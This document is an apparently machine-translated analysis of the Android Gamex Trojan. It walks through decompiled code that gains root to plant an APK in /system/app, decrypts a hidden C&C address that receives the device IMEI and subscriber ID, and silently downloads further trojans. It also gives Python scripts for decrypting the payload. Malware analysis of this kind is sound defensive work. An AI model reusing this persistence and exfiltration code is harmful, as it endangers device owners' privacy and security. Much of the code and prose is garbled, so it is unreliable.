Android Gamex Trojan Analysis Report

This Gamex Trojan sample was just obtained in May and is not destructive, but it is good for security analysts.

Today, I will share with you the complete analysis process of this sample.
Tools
ApkTool, dex2jar, and DJ Java Decompiler
Python2.6 write a decryption script
Analysis
This sample is infected by bundling the software SD-Booster. When the infected SD-Booster is installed and running, the trojan will automatically
Install it in the Android system. In order to locate the infected part as soon as possible, download the uninfected SD-Booster for reverse compilation and comparison. Result 1 is shown:

Figure 1
The program is implanted with "com. android. md5" and "com. gamex. inset" packages. First, find the loading location of the program
The onCreate () method of the class inserts the following code:
Public void onCreate (Bundle paramBundle ){
Super. onCreate (paramBundle );
A. B (this );
...
}
A is the class in the "com. gamex. inset" package. The code of the. B () method is as follows:
Public static void B (Context paramContext)
{
Context = paramContext;
Intent localIntent = new Intent (paramContext, Settings. class );
ComponentName localComponentName = paramContext. startService (localIntent );
}
The Settings. class service is started directly. The startup code is as follows:
Public void onStart (Intent paramIntent, int paramInt)
{Super. onStart (paramIntent, paramInt );
New Settings.1 (this). start ();
}
Class Settings $1 extends Thread
{
Public void run ()
{
If ((! A. a) & (A. c () & (A. d (A. context )))
{
A. a = 1;

Settings localSettings = this. this $0; new C (localSettings ). start () ;}while (true) {return; this. this $0. stopSelf () ;}}. a is initialized to 0 to determine whether the trojan is running.. c () only one line of code is required to determine whether the SD card is ready for subsequent virus downloads.. d () judge the trojan program "com. android. setting "indicates whether the Trojan has been installed. If the above conditions are not met, start the C thread to install the trojan. The run () method of class C cannot be displayed in Dex2jar, in DJ Java Decompiler, you can see the complete decompilation code. The thread uses context. getAssets (). open ("logos.png") reads the trojan file and obtains the final apk installation file through decryption. The decryption code is implemented in python as follows: #-*-coding: utf- 8-*-import sysdef main (filename): infile = file (filename, "rboutfile = file (filename [:-4] + ". ") apk", "wb while 1:") c = infile. read (1) if not c: break c = chr (ord (c) ^ 18) outfile. write (c) outfile. close () infile. close () if _ name _ = '_ main _': main (sys. argv [1]) Only decrypts the entire file from or to 0x12, and runs "python decrypt_apk.py logos.png.pdf" to generate the logos.apk Trojan file. After the decryption is completed in the previous step, the (String) method is called to install the trojan. The Code is as follows: protected static void a (String paramString) {try {Process localProcess = runtime.getruntime(cmd.exe c ("su"); OutputStream localOutputStream = localProcess. getOutputStream (); DataOutputStream localDataOutputStream = new DataOutputStream (localOutputStream); localDataOutputStream. writeBytes ("mount-o remount rw/system \ n"); String str = "cp-I" + paramString + "/syst Em/app/ComAndroidSetting.apk \ n "; localDataOutputStream. writeBytes (str); Thread. sleep (20000L); localDataOutputStream. writeBytes ("chmod 644/system/app/ComAndroidSetting.apk \ n"); localDataOutputStream. writeBytes ("exit \ n"); localDataOutputStream. flush (); int I = localProcess. waitFor (); return;} catch (IOException localIOException) {while (true) localIOException. printStackTrace ();} catch (InterruptedExce Ption localInterruptedException) {while (true) localInterruptedException. printStackTrace () ;}} the entire program is copied to the "/system/app/" directory to make it a system program! After the installation is complete, run the following code to send the broadcast and stop the Settings service: ntent intent = new Intent ("kurhjfngjhfjghdfjgjjdh"); context. sendBroadcast (intent); Intent intent1 = new Intent (context, com/android/md5/Settings); boolean flag3 = unpack. After dex2jar is used, View "AndroidManifest. the xml file finds that the trojan has no interface and runs through two boot broadcasts, as shown in Figure 2. This also verifies SDBoost's analysis of sending strange string broadcasts, the code of the first broadcast receiver is as follows: Public class B extends BroadcastReceiver {public static final String q = "android. intent. action. BOOT_COMPLETED "; public static final String qx =" kurhjfngjhfjghdfjgjjdh "; public void onReceive (Context paramContext, Intent paramIntent) {if (paramIntent. getAction (). equals ("android. intent. action. BOOT_COMPLETED ") | (paramIntent. getAction (). equals ("kurhjfngjhfjghdfjgjjdh"). B (paramContext) ;}} this. The Settings. class Service, which starts a thread. You can find the Framework Code similar to the preceding analysis thread as follows: public void run () {try {this. this $ 0.d(); sleep (30000L); if ((! A. a) & (. c () & (. d (this. this $0) {. a = 1; Settings localSettings1 = this. this $0; new E (localSettings1 ). start (); return ;}} catch (InterruptedException localInterruptedException ){...} D () is responsible for decoding the address of the C & C (Control & Command) server and sending the privacy information of the mobile phone. The decoded code is the getUrl () method of Settings, which is implemented using python decoding: #-*-coding: UTF-8-*-import sysdef decrypt2url (decryptedfile): f = file (decryptedfile, "r") buf = f. read () bs = map (ord, buf) # store the byte stream in the 10-digit list sizz = len (bs) for I in range (0, sizz, 2 ): # The following words are exchanged with the previous words for storage if I> = sizz/2: break d = bs [I] bs [I] = bs [sizz-1-I] bs [sizz-1-I] = d ss = ''. join (map (chr, bs) bs2 = ss. split (',') # Use commas to separate bss = list (bs2) sout = ''for I in range (0, len (bss), 2 ): sout = sout + chr (int (bss [I]) print sout def main (filename): PASS = ''. join (chr (x) for x in [9, 5, 9, 8, 5]) # This is the decrypted atomic infile = file (filename, "rboutfile = file (filename [:-4] + ". ") txt", "wb I = 0") while 1: c = infile. read (1) if not c: break j = I % 5d = PASS [j] c = chr (ord (c) ^ ord (d) I = I + 1outfile. write (c) outfile. close () infile. close ()

Decrypt2url (filename [:-4] + ". txt

")
If _ name _ = '_ main __':
Main (sys. argv [1])
In this example, each byte of the “logo.png file is the same or different from that of the [9, 5, 9, 8, 5] decrypted atom.
Content 3:

 

Figure 3
After this string is obtained, it is sorted in reverse order at the beginning and end of the string. Each comma-separated number is an ASCII character.
And obtain the final URL address from the even ASCII digits. In addition, to take care of the students who use JAVA, I also use JAVA to decrypt the code.
One copy is implemented and packaged in the attachment. the decrypted Result 4 is shown below:

Direct access to this URL is forbidden. In the d () method, set getDeviceId (), getSubscriberId (), Build. MODEL,

The result of getApplicationInfo (str3, 128). metaData. getString ("CMP_PID") is combined with its character to form the final network address" http://www.fineandroid.com/inputex/index.php?s=/Interface/keinter/a1/DeviceId/a2/SubscriberId/a3/MODEL/index/xian1234 ", And finally call the B (String) method to start a thread to send the information. The Code is as follows: public void run (){... HttpGet localHttpGet = new HttpGet (str); try {HttpResponse localHttpResponse = new defaulthttpclient(cmd.exe cute (localHttpGet); if (localHttpResponse. getStatusLine (). getStatusCode () = 200) & (EntityUtils. toString (localHttpResponse. getEntity ()). equals ("1") {SharedPreferences. editor localEditor1 = this. this $0. getSharedPreferences ("tijiao", 0 ). edit (); SharedPreferences. editor localEditor2 = localEdit Or1.putInt ("biaoji", 1); boolean bool = localEditor1.commit ();} return;} catch (ClientProtocolException localClientProtocolException ){... }...} If the submission is successful, it will be saved to SharedPerferences. we construct A string for manual access 5, as shown in Figure 5. Continue to return to the Settings.1 thread just now. After completing the work, we start to judge again.. a. Determine whether the trojan is running.. c () Determine whether the SD card is ready.. d (Context) to determine whether "com. android. update "Trojan program. If the above conditions are met, start an e-thread for work. The e-thread starts to register two broadcast receivers" android. intent. action. PACKAGE_ADDED and android. intent. action. PACKAGE_CHANGED. After receiving the "Intent (" akjgikurhnfjghfkj ")" broadcast, the broadcast starts Settings. class service. After this step is completed, the thread runs and decodes "com. android. update the trojan program. android. s The etting code is the same. You can use the previous "decrypt_apk.py" script to decrypt the trojan APK file and call the () method to install the "com. android. update" Trojan. Here, the Trojan Installation and information triggered by the B-class boot broadcast receiver are sent to this end. Let's take a look at the code of the other D-class boot broadcast receiver. Its code is very simple. After receiving the broadcast, obtain the package name of the Trojan, and then call "pm install-r" in the () method to reinstall the Trojan. android. the setting Trojan is analyzed here. Let's take a look at "com. android. update ". This is also the core part of Gamex Trojans.
Source: This site reposted by: Non-insect time: 2013-07-31 TAG: This "com. android. update: The startup of the Trojan core is completed by the boot broadcast, as shown in figure 6. The broadcast receiver code is as follows: public class B extends BroadcastReceiver {public static final String a = "akjgikurhnfjghfkj "; public static final String q = "android. intent. action. BOOT_COMPLETED "; public void onReceive (Context paramContext, Intent paramIntent) {if (paramIntent. getAction (). equals ("android. intent. action. BOOT_COMPLETED ") | (para MIntent. getAction (). equals ("akjgikurhnfjghfkj"). boot (paramContext) ;}} after receiving the broadcast, the Updater is started by calling the Class A boot () method. class service, this waiter has four classes to complete all the Trojan work, the code is: public void onStart (Intent paramIntent, int paramInt) {super. onStart (paramIntent, paramInt); D localD = new D (this); this. activityThread = localD; F localF = new F (this); this. getSoftThread = localF; G localG = new G (this); this. downSoftThread = localG; H localH = new H (This); this. installSoftThread = localH;} the division of labor among the four objects is clear. Let's analyze it slowly. The first object D is the "guard" object and is responsible for "Ventilation, during object construction, the broadcast receiver D.1 was registered to listen to "android. intent. action. SCREEN_OFF "and" android. intent. action. SCREEN_ON ", when the latter is triggered, start HOME to hide itself. when the former is triggered, it silently collects information about the software installed by the user, step: D.1 first, call the D () method of the M Member of the d object to query the installed but not running trojan software. The M member is the database query operation object in the D object, create the D object during initialization, and then call D. f () method to obtain the running software, and with M. the list returned by the d () method is compared. If you find the program that is not running, localPackageManager. getLaunchIntentForPackage (String) to obtain the Ac Titanetname, and paramContext is called. startActivity (localIntent1) starts the program and then calls M. j (String) method to update the software running status database, and finally call D. the n (String) method sends information to the C & C server. The Code is as follows: public void n (String paramString) {String str1 = (TelephonyManager) this. g. getSystemService ("phone ")). getDeviceId (); // obtain IMEI if (str1 = null) str1 = ""; String str2 = String. valueOf (j (); String str3 = String. valueOf (str2 + "inputex/index. php? S =/Interface/neiinter/a1/"); String str4 = str3 + str1 +"/nam/"+ paramString; j (str4);} j () the method is used to decrypt the "icon.png" file under the Assets Directory to obtain the C & C address. You can still use decrypt_url.py to decrypt the file. The decrypted address is still" http://www.fineandroid.com/ ", Combined to generate the URL and call j (String) to send it out. android. android is the same. Here, even if the D object understands it, the next one is the F object. The F object is also very simple. It reads the list of trojans on the Trojan server and writes the list to the local database for Trojan query. The address obtained by F. k () is" http://fineandroid.com/InstallApk/php4sam.php Directly access 7, as shown in:

Figure 7 the trojan was prepared by a Chinese user. Are there any Trojans? The entire html content is interpreted by J. a (InputStream). Here we will not post the content due to space limitations. The final List data obtained through M. g (String ,...) The database is inserted and F. e (String) performs simple encryption and I will not analyze it. Let's look at the third G class, which is responsible for downloading Trojans. The core method is loop (). First, call M. C () Check the trojan software that has not been downloaded. If the software has not been downloaded, check whether it is in the WIFI environment. If the conditions are met, a new P object is created, and the latter calls K. d (String ,...) Start download. Call M. h () sets the Download Status of the Trojan. After all the work is done, the thread enters the sleep state. In the WIFI status, the thread is rested for 1 minute, and in the non-WIFI status, the thread is rested for 5 hours. The Code is as follows: protected void loop () {NetworkInfo localNetworkInfo = (ConnectivityManager) this. e. getSystemService ("connectivity ")). getActiveNetworkInfo (); List localList; if (localNetworkInfo! = Null) & (localNetworkInfo. isAvailable ())&&(! This. d) {localList = this. h. c (); if (localList. size () = 0) setSleepTime (60000L); // if there is no software to download, take 1 minute off} while (true) {return;
If (localNetworkInfo. getTypeName (). equals ("WIFI") // check whether {localIterator = localList. iterator (); if (! LocalIterator. hasNext () continue ;... Handler localHandler1 = this. f; new P (localContext1, str1, str2, "download/", str3, localHandler1 ). start (); // start to download this. d = 1; setSleepTime (60000L); // After downloading, take a rest for 1 minute to continue ;}... New P (localContext2, str4, str5, "download/", str6, localHandler2 ). start (); // start to download this. d = 1; setSleepTime (18.000l); // 5 hours of rest... } The last H class is the installation class. It does not do any substantive work, but broadcasts the downloaded trojan software status to the database every other time. The entire Gamex Trojan is analyzed. By analyzing Gamex Trojans, we can see that a large number of codes, such as code bundling, silent software installation, URL submission and response, boot broadcast, and file encryption and decryption, are used, these codes are common in the daily coding process of Android programmers. Only by mastering the Android Foundation and analyzing the program can Android Trojans be viewed transparently. Finally, add a Gamex flowchart for your understanding.